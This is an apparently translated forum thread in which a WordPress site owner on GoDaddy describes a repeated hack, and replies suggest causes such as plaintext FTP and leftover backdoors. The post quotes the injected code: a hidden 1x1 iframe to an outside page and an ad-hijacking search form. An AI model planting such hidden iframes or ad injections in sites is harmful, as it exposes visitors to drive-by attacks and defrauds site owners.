网站再次遭到黑客攻击

网站再次遭到黑客攻击

最后更新:

过去几周一切都很平静,这让我对网站安全和风险有了更多的了解。以下是我的故事版本 -

我使用的是旧版本的 wordpress,可能是这个人从谷歌上发现了我。我认为这是一个脚本攻击。很难说安全是如何以及何时受到损害的,2009 年 11 月 5 日我注意到了这一点。虽然我当时采取了一些安全措施(如下所述),但总是有可能我在格式化工作电脑时忘记了重新更改 wordpress 密码。

现在我已经从托管中删除了所有不需要的 php 脚本,使管理部分只能由我的 IP 访问,并阻止了属于越南的特定 IP 范围。每日备份和其他内容。问题是涉及的变量太多,很难跟踪每一个变量。主要的教训是做好准备。:)


我使用 GoDaddy 的共享主机方案,并运营一个 WordPress 网站。我的网站第一次被黑客入侵是在 2009 年 11 月 5 日。当时,黑客被取代我的广告和他自己的广告混为一谈。我以为这是因为我懒于做安全保护,但我错了。

我格式化了我的电脑并重新设置了一切。用 Microsoft Security Essentials 替换了 ESET NOD32。升级到最新版本的 WordPress。更改了所有密码。设置了新数据库。以及我到处阅读的其他与安全相关的内容。一段时间内一切都运行良好,直到今天我的网站再次遭到黑客攻击。

上次,这个人修改了很多文件,并特别更改了 footer.php 和所有与广告相关的文件。但这次他只是找到了正确的地方,并用以下代码替换了它 -

<IFRAME height=1 src="http://blackberryrss.com/check.html" frameBorder=0 width=1></IFRAME>

<form action="http://www.google.com/cse" id="cse-search-box">
  <div>
    <input type="hidden" name="cx" value="partner-pub-2815780429722377:hhm6d0-6wfw" />

    <input type="hidden" name="ie" value="ISO-8859-1" />
    <input type="text" name="q" size="31" />
    <input type="submit" name="sa" value="Search" />
  </div>
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en"></script>

看起来那个人对操纵数据库等不感兴趣,只是放置代码并赚快钱。Godaddy 转发了我的 ftp 日志,发现来自 IP - 117.2.56.31 的未经授权的访问。这个 IP 属于越南,而且http://blackberryrss.com和越南有某种联系。

我的账户没有 SSH 访问权限,我使用 FireFTP 连接到 FTP。这是 GoDaddy 上次的回应 -

在检查您的帐户后,我们发现您的 FTP 帐户已被入侵,原因可能是您本地计算机上存在恶意软件,或者 FTP/托管密码较弱。

但我已经更改了所有密码,删除了账户等,但似乎没有任何效果。我现在一头雾水。请告诉我该怎么办?我如何防止他人未经授权访问我的账户??????

额外细节:

  • 密码强度只是“强”,但不是最好的。
  • 我个人使用 Windows XP SP3、Windows 防火墙等。第一次攻击后,我学会了使用用户帐户工作并避免使用管理员帐户。
  • 当我看到第一次攻击的 FTP 日志时,很明显那个人正在手动完成所有这些操作。

答案1

请记住,FTP 会以明文形式发送您的密码。因此,肯定存在泄露的可能性。

另一件需要考虑的事情是,您的 FTP 密码是否在您的主机中是唯一的?您确定您没有在其他地方使用它吗?没有其他帐户、网站等?

您的电子邮件密码有多安全?我曾遇到过这样的案例,其中的“薄弱环节”其实就是电子邮件密码,而罪犯只是向电子邮件发送“忘记密码”信息,并从邮箱中删除证据,而当时大家都太忙于关注被入侵的服务器而没有注意到。

我想到的一些事情...当然,其他一些事情可能是您的 ISP 采取的社会工程方法,或者您的服务器或您托管的某个软件包中存在某些软件漏洞。

还有更多(显然),但这些通常是“惯犯”。


更新:

根据这一新信息(黑客没有使用 FTP 来更改您的文件),我只能假设最可能的原因可能是不安全的网络应用程序。

这不是唯一可能的情况,但在这种情况下是最有可能的。

另一件需要考虑(并检查)的事情是他是否为您的应用程序留下了某种“后门”。我似乎记得您之前提到过,您的 ISP 说他是通过 FTP 进入的。他第一次通过 FTP 进入并留下后门的可能性是否可能?

此外,这只是一种猜测,但我亲眼目睹过被入侵的机器,黑客只进入过一次,但却留下了一个 cron 任务,不断更改文件和其他各种恶意行为。黑客有没有可能没有回来,而你正在处理一个自动脚本?如果你觉得你已经用尽了所有其他可能性,可以检查一下。

最后,您是否可以访问您的网络日志、系统日志等?如果可以,它们会说什么?它们会透露任何线索吗?

答案2

你可能想读WordPress 黑客攻击事件详细事后分析另一篇帖子提供了大量关于WordPress 博客黑客带有链接。WordPress 本身有一个常问问题关于你的博客被黑客入侵后该怎么办。

WordPress 是一个备受攻击的应用程序,因为它非常受欢迎。打击这些网站的黑客是一项全职工作。从您的描述来看,似乎有人发现了 WordPress 的漏洞,并充分利用了它。到目前为止,您似乎做的一切都是正确的,但我认为攻击者正在将文件放入您的网站并从那个方向发起攻击。我向您指出的第一个链接非常详细地描述了这一点以及他们采取了哪些步骤来应对它。

最后,你可能不得不考虑从 WordPress 换成其他博客应用程序。祝你好运,希望这篇文章能对你有所帮助。

答案3

GoDaddy 为您提供SSH 访问您可以使用端口 22 上的 Putty.exe 连接到您的帐户。连接后,您可以使用 Putty 在端口 20 和 21 上创建 2 个代理/隧道。然后,您可以通过安全隧道使用 ftp 获取您的文件。

或者更好的是,你可以使用更简单的方式做同样的事情远程服务器端程序 命令,或者您可以使用 FileZilla 客户端连接到端口 22。

答案4

除非您通过安全隧道运行所有 FTP 会话(或者更好的是,使用 sftp),否则该密码将被嗅探。

我们的标准做法是完全不启用 FTP。如果有必要,我们只允许匿名 FTP,并将其严格限制在已知区域。

如果需要上传,我们不允许列出上传目录。

相关内容